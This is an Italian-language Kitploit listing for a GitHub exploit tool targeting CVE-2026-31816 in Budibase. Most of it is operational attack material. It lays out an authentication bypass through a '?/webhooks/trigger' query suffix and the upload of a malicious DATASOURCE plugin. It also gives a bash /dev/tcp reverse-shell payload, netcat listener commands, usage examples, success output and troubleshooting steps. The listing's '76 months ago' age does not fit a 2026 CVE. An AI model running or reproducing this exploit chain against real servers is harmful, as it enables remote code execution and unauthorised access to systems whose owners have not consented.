Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31816-rshell — Sfrutta la CVE-2026-31816 in Budibase per bypassare l'autenticazione, caricare un plugin datasource dannoso ed eseguire una reverse shell per l'accesso remoto. | Kitploit
Strumenti/GitHubGitHub/imjdl/cve-2026-31816-rshell
ExploitSfruttamento di Applicazioni WebAutenticazioneStrumento di Accesso RemotoSviluppo Payload
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

Sfrutta la CVE-2026-31816 in Budibase per bypassare l'autenticazione, caricare un plugin datasource dannoso ed eseguire una reverse shell per l'accesso remoto.

Vedi Repository
76 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit Reverse Shell CVE-2026-31816

Panoramica

Questo strumento sfrutta la CVE-2026-31816 per stabilire una connessione reverse shell su un server Budibase di destinazione.

Catena di attacco: Bypass dell'autenticazione → Upload del plugin DATASOURCE → Esecuzione di codice lato server → Reverse Shell

Requisiti

  • Python 3.6+
  • Libreria requests (pip install requests)
  • Server Budibase di destinazione vulnerabile alla CVE-2026-31816

Utilizzo

Passaggi di base

root@kitploit:~
# 1. Avvia il listener sulla macchina dell'attaccante
nc -lvnp 4444

# 2. Esegui l'exploit (un altro terminale)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444

Parametri

ParametroObbligatorioDescrizione
-t, --target✅URL Budibase di destinazione
--lhost✅Host del listener (il tuo IP)
--lport❌Porta del listener (predefinita: 4444)

Esempi

root@kitploit:~
# IP dell'attaccante: 192.168.1.100
# Budibase di destinazione: 192.168.1.128:10000

# Terminale 1 - Avvia il listener
nc -lvnp 4444

# Terminale 2 - Esegui l'exploit
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

Come funziona

1. Verifica della vulnerabilità

root@kitploit:~
GET /api/integrations?/webhooks/trigger

Se restituisce 200, il target è vulnerabile al bypass dell'autenticazione.

2. Creazione del plugin dannoso

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

I plugin di tipo DATASOURCE eseguono codice JavaScript sul server.

3. Payload della reverse shell

root@kitploit:~
// Eseguito quando il plugin viene validato:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. Upload ed esecuzione

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

Carica il plugin bypassando l'autenticazione. Il codice viene eseguito durante la validazione.

Flusso dell'attacco

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Attaccante │     │   Server    │     │  Listener   │
│             │     │   Target    │     │   (nc)      │
│             │     │             │     │             │
│ exploit ────┼────►│ Upload      │     │             │
│             │     │ Plugin      │     │             │
│             │     │ Esegui      │────►│ Ascolta     │
│             │     │ Codice      │◄────┤ Reverse     │
│             │     │             │     │ Connect     │
└─────────────┘     └─────────────┘     └─────────────┘

Indicatore di successo

root@kitploit:~
============================================================
CVE-2026-31816 - Exploit Reverse Shell
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444

[*] Verifica della vulnerabilità...
[+] Il target è vulnerabile!
[*] Creazione del plugin reverse shell verso 192.168.1.100:4444

[*] Upload del plugin reverse shell...
[*] Stato: 200
[+] Plugin installato con successo!

============================================================
[+] SUCCESSO! Controlla il tuo listener!
============================================================

Risoluzione dei problemi

D: Connessione fallita, nessuna shell ricevuta

Possibili cause:

  1. Il firewall blocca la connessione reverse
  2. Il server di destinazione non può raggiungere l'IP dell'attaccante
  3. Il server di destinazione non dispone di bash

Soluzioni:

root@kitploit:~
# Verifica la connettività di rete
ping YOUR_IP

# Controlla il firewall
sudo ufw allow 4444/tcp

# Prova una porta diversa
nc -lvnp 8080

D: Upload fallito

Possibili cause:

  1. Il target ha applicato la patch alla vulnerabilità
  2. Problemi di rete

Soluzioni:

root@kitploit:~
# Verifica manualmente se la vulnerabilità esiste
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# Se restituisce JSON, la vulnerabilità esiste
Scarica lo strumento